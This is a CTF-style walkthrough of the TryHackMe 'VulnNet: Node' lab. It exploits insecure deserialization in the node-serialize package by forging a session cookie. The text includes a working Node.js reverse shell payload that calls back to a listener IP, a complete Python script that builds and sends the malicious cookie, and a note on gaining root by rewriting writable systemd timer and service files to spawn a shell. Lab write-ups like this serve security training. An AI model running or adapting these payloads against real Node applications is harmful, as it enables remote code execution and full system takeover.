VulnNet: Node TryHackMe WalkThrough

After the previous breach, VulnNet Entertainment states it won't happen again. Can you prove they're wrong?

VulnNet Entertainment has moved its infrastructure and now they’re confident that no breach will happen again. You’re tasked to prove otherwise and penetrate their network.

  • Difficulty: Easy
  • Web Language: JavaScript

Enumeration

More Enumeration…


Manual Enumeration

  • No sensitive data in the page source.

Let's open Burp and intercept the request.

Looking at the cookie, I can see that the value of session is a base64 value that has then been URL-encoded (the == padding shows up as %3D%3D):

eyJ1c2VybmFtZSI6Ikd1ZXN0IiwiaXNHdWVzdCI6dHJ1ZSwiZW5jb2RpbmciOiAidXRmLTgifQ%3D%3D
{"username":"Guest","isGuest":true,"encoding": "utf-8"}

Tampering with these values alone (for example setting isGuest to false) is unlikely to give anything, so the way into the machine is most likely through some RCE in whatever the server does with this cookie.


Let’s Learn & Hack

Use the same cookie and request the home page /.
  • Point to note: the response contains an unserialize error, which means the server is passing the cookie through an unserialize() call rather than a plain JSON parse. The _$$ND_FUNC$$_ prefix in the payload below is the function marker used by the node-serialize package, whose unserialize() eval()s whatever follows it.

Let's use the Node.js reverse shell payload from PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#nodejs

Used payload (replace 10.14.12.48 and 4444 with your own listener, then base64-encode and URL-encode the JSON the same way as the original cookie before sending it as session; the trailing () makes the function run as soon as it is deserialized):

{"username":"_$$ND_FUNC$$_function (){(function(){var net = require('net'),cp = require('child_process'),sh = cp.spawn('/bin/sh', []);var client = new net.Socket();client.connect(4444, '10.14.12.48', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});})();}()"}
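As an added example (not part of the original walkthrough), here is a small Python helper that does the cookie handling by hand: it decodes the captured session value, builds the node-serialize payload for your own listener, and re-encodes it exactly as the app expects (JSON, then base64, then URL-encoding). The listener address, the target URL placeholder and the function names are my assumptions.

```python
import base64
import json
import urllib.parse
import urllib.request

# Session cookie captured in Burp on the walkthrough box, still URL-encoded.
CAPTURED_COOKIE = (
    "eyJ1c2VybmFtZSI6Ikd1ZXN0IiwiaXNHdWVzdCI6dHJ1ZSwiZW5jb2RpbmciOiAidXRmLTgifQ%3D%3D"
)

# node-serialize prefixes serialized functions with this marker and, on unserialize(),
# eval()s everything after it. Appending "()" to the function turns it into an IIFE,
# so the body runs the moment the cookie is deserialized, before any isGuest check.
ND_FUNC_MARKER = "_$$ND_FUNC$$_"


def decode_session(cookie: str) -> dict:
    """URL-decode, base64-decode and JSON-parse the session cookie."""
    raw = base64.b64decode(urllib.parse.unquote(cookie))
    return json.loads(raw)


def encode_session(session: dict) -> str:
    """Inverse of decode_session(): JSON -> base64 -> URL-encode ('=' padding becomes %3D)."""
    b64 = base64.b64encode(json.dumps(session).encode()).decode()
    return urllib.parse.quote(b64, safe="")


def build_rce_payload(lhost: str, lport: int) -> str:
    """The walkthrough's Node.js reverse shell, parameterised on the listener host/port."""
    js = (
        "function(){(function(){"
        "var net=require('net'),cp=require('child_process'),"
        "sh=cp.spawn('/bin/sh',[]);"
        "var client=new net.Socket();"
        f"client.connect({lport},'{lhost}',function(){{"
        "client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);"
        "});})();}()"
    )
    return ND_FUNC_MARKER + js


def build_malicious_cookie(lhost: str, lport: int) -> str:
    """Put the payload where the app expects a username, encoded like the real cookie."""
    return encode_session({"username": build_rce_payload(lhost, lport)})


def send_cookie(url: str, cookie: str, timeout: float = 5.0) -> int:
    """Request `url` with the forged session cookie and return the HTTP status.

    Not exercised offline: the shell arrives at your listener, not in the response.
    """
    req = urllib.request.Request(url, headers={"Cookie": "session=" + cookie})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    print("captured cookie decodes to:", decode_session(CAPTURED_COOKIE))
    # Hypothetical listener values: swap in your own IP and port.
    forged = build_malicious_cookie("10.14.12.48", 4444)
    print("forged session cookie:", forged)
    # Start `nc -lvnp 4444` first, then (hypothetical target URL):
    # send_cookie("http://<target>/", forged)
```

Start your netcat listener before calling send_cookie(); the request itself will usually hang or return an error because the spawned shell keeps the handler busy, and that is expected.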

Got the reverse shell as www, then did a lateral escalation to another user.


Privilege Escalation

Change the writable .timer and .service files so that the service's ExecStart launches a reverse shell to your listener.

Once the timer fires (1 second later) the service runs as root, and you get a root shell.